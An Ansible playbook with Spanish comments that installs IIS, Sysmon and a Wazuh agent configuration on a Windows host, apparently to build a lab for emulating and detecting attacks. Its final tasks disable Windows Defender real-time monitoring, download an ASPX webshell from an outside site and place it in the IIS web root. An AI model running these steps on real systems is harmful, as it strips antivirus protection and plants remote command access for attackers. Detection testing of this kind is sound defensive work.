---
- name: Instalar IIS
  hosts: Windows-Agente
  gather_facts: false
  tasks:
    - name: Instalar IIS y características requeridas
      win_feature:
        name:
          - Web-Server            # IIS
          - Web-WebServer         # Web Server
          - Web-Common-Http       # Common HTTP Features
          - Web-Default-Doc       # Default Document
          - Web-Dir-Browsing      # Directory Browsing
          - Web-Http-Errors       # HTTP Errors
          - Web-Static-Content    # Static Content
          - Web-Health            # Health and Diagnostics
          - Web-Http-Logging      # HTTP Logging
          #- Web-Log-Libraries     # Logging Tools
          #- Web-Request-Monitor   # Request Monitor
          #- Web-Http-Tracing      # Tracing
          - Web-Performance       # Performance Features
          - Web-Stat-Compression  # Static Content Compression
          - Web-Security          # Security Features
          - Web-Filtering         # Request Filtering
          #- Web-Basic-Auth        # Basic Authentication
          #- Web-Windows-Auth      # Windows Authentication
          - Web-App-Dev           # Application Development
          - Web-Net-Ext           # .NET Extensibility
          - Web-Net-Ext45         # .NET Extensibility 4.5
          - Web-ASP               # ASP
          - Web-ASP-Net           # ASP.NET
          - Web-ASP-Net45         # ASP.NET 4.5
          #- Web-CGI               # CGI
          - Web-ISAPI-Ext         # ISAPI Extensions
          - Web-ISAPI-Filter      # ISAPI Filters
          - Web-Mgmt-Tools        # Management Tools
          - Web-Mgmt-Console      # IIS Management Console
        state: present

    - name: Asegurarse de que existe el directorio Temp
      win_file:
        path: C:\Temp
        state: directory

    - name: Descargar Sysmon
      win_get_url:
        url: https://download.sysinternals.com/files/Sysmon.zip
        dest: C:\Temp\Sysmon.zip

    - name: Descargar configuración de Sysmon
      win_get_url:
        url: https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml
        dest: C:\Temp\sysmonconfig.xml

    - name: Unzip Sysmon
      win_unzip:
        src: C:\Temp\Sysmon.zip
        dest: C:\Temp
        creates: C:\Temp\Sysmon.exe

    - name: Instalar Sysmon con configuración previa descargada
      win_shell: |
        C:\Temp\Sysmon.exe -accepteula -i C:\Temp\sysmonconfig.xml
      args:
        creates: C:\Windows\Sysmon.exe

    - name: Eliminar zip de Sysmon
      win_file:
        path: C:\Temp\Sysmon.zip
        state: absent

    - name: Eliminar configuración de Sysmon
      win_file:
        path: C:\Temp\sysmonconfig.xml
        state: absent

    - name: Eliminar ejecutable de Sysmon
      win_file:
        path: C:\Temp\Sysmon.exe
        state: absent

    - name: Copiar script configuración agente a la máquina remota
      win_copy:
        src: ./scripts_ansible/configurar_agente.ps1
        dest: 'C:\Temp\configurar_agente.ps1'

    - name: Ejecutar script de configuración en la máquina remota
      win_shell: 'powershell.exe -ExecutionPolicy Bypass -File C:\Temp\configurar_agente.ps1'

    - name: Reiniciar agente Wazuh
      win_service:
        name: wazuh
        state: restarted

    - name: Desactivar la monitorización en tiempo real de Windows Defender
      win_shell: Set-MpPreference -DisableRealtimeMonitoring $true

    - name: Descargar webshell.aspx
      win_shell: Invoke-WebRequest -OutFile 'C:\Users\Public\Downloads\webshell.aspx' -Uri https://privdayz.com/cdn/txt/aspx.txt

    - name: Copiar webshell.aspx al directorio wwwroot
      win_shell: copy 'C:\Users\Public\Downloads\webshell.aspx' 'C:\inetpub\wwwroot\webshell.aspx'
